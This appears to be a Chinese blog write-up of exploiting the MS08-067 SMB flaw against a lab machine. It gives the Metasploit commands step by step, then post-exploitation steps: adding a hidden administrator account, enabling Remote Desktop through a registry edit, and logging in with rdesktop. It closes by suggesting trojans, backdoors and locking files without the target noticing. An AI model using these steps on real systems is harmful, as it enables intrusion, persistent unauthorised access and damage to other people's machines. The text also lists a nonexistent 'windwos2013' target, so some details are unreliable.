MS08-067漏洞

1640人浏览 / 0人评论

一、漏洞简介

MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。

 二、环境简介

靶机:windwos2013 

靶机ip:10.0.0.7

三、漏洞还原

1、进行msf

msfconsole

2、查询漏洞

 search ms08_067

3、进入漏洞模块

 use exploit/windows/smb/ms08_067_netapi

4、 查看攻击使用方法

show options 

5、查看影响版本和其他信息

info  

6、设置靶机ip

set RHOSTS 10.0.0.7 

7、检查对端是否存在漏洞

 msf5 exploit(windows/smb/ms08_067_netapi) > check 
[+] 10.0.0.7:445 - The target is vulnerable.

8、 开始攻击

 exploit 

9、 查看sessions

sessions -i  

10、 其他命令

back                返回上一层
banner           查看系统信息

11、提权和开通远程登录端口

创建用户并提权

输入命令net user kali kali123 /add,创建用户kali ,密码为 kali123 (用户和密码可自由填写, 注密码必须是字母加数字) 。因为我已经创建过了,所以提示用户已存在!

 

将root用户添加到管理员组 ,输入命令net localgroup administrators kali /add。

 

由于 kali 中文版显示为乱码(建议安装英文版),所以直接在靶子 机上查看是否提权成功 !在靶机命令行直接输入net localgroup administrators就可以查看。如果有kali,说明提权成功!

开启远程桌面:开启3389端口

在shell下输入以下命令 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " "Server /v fDenyTSConnections /t REG_DWORD /d 0000000 0 /f

输入netstat –an 查看是否开启成功

 

使得目标靶机开启3389端口之后,我们就能远程登陆靶机了,新开一个终端输入rdesktop -f -a 16 IP:3389(IP为靶子机地 址),Rdesktop在kali下是默认安装的,如果没有安装,在终端输入命 令apt-get install rdesktop 进行安装。

 

通过远程登陆靶机之后,就可以干你想干的事了,上传木马啊,留后门啊,锁文件啊,之类的。之后的就凭自己想象了!关键是,这都是在靶机不知不觉中进行的!

 

全部评论